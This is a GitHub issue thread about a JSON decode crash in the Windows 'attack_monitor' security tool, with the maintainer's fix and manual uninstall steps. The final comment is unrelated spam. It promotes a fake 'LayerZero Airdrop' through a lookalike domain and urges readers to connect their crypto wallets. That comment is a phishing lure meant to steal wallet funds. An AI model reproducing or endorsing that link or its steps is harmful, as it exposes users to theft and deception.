### ISSUE TITLE
raw_decode     raise JSONDecodeError(

### ISSUE THREAD

**Issue by Mehran** [yarox24/attack_monitor#3]
```
Traceback (most recent call last):
  File "madvr.py", line 254, in <module>
    main()
  File "madvr.py", line 166, in main
    load_initial_exception_rules(cc, EXCEPTION_RULES)
  File "madvr.py", line 67, in load_initial_exception_rules
    rules = json.load(open(exception_path, 'r', encoding='utf8'))
  File "C:\Users\Mehran\AppData\Local\Programs\Python\Python37-32\lib\json\__init__.py", line 296, in load
    parse_constant=parse_constant, object_pairs_hook=object_pairs_hook, **kw)
  File "C:\Users\Mehran\AppData\Local\Programs\Python\Python37-32\lib\json\__init__.py", line 348, in loads
    return _default_decoder.decode(s)
  File "C:\Users\Mehran\AppData\Local\Programs\Python\Python37-32\lib\json\decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "C:\Users\Mehran\AppData\Local\Programs\Python\Python37-32\lib\json\decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
```

**Comment by n3rmix** [comment]
Having the same issue.
Win10 1909
Python 3.8.0

**Comment by Mehran** [comment]
how we can fully uninstall it?

**Comment by n3rmix** [comment]
After studying the installer script...it’s seems there is no automated way for complete uninstalling....unfortunately.
Delete the related schedule task and remove the install folder.

**Comment by yarox24** [comment]
Hi guys,

**Solving problem guide:**
This problem can be solved by removing file _FORCE_EMPTY_DIR_ 
from C:\Program Files\Attack Monitor\config\exceptions

like described in issue 1 - https://github.com/yarox24/attack_monitor/issues/1


**Uninstall guide:**
1. Delete folder: C:\Program Files\Attack Monitor\
2. Delete scheduled task: "Attack Monitor - Autostart"
3. Remove sysmon by launching sysmon.exe -u
4. PowerShell/ Windows event logs audit policy was changed - it needs to be undone manually
5. WMI audit policy was changed  it needs to be undone manually

**Comment by n3rmix** [comment]
> Hi guys,
> 
> **Solving problem guide:**
> This problem can be solved by removing file _FORCE_EMPTY_DIR_
> from C:\Program Files\Attack Monitor\config\exceptions
> 
> like described in issue 1 - #1

Thx yarox24...you're right - I missed it. My fault - sorry.
Removing the file solve the issue for me. Keep it running...

Any chance to keep the cmd-windows hidden after autostart?

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.
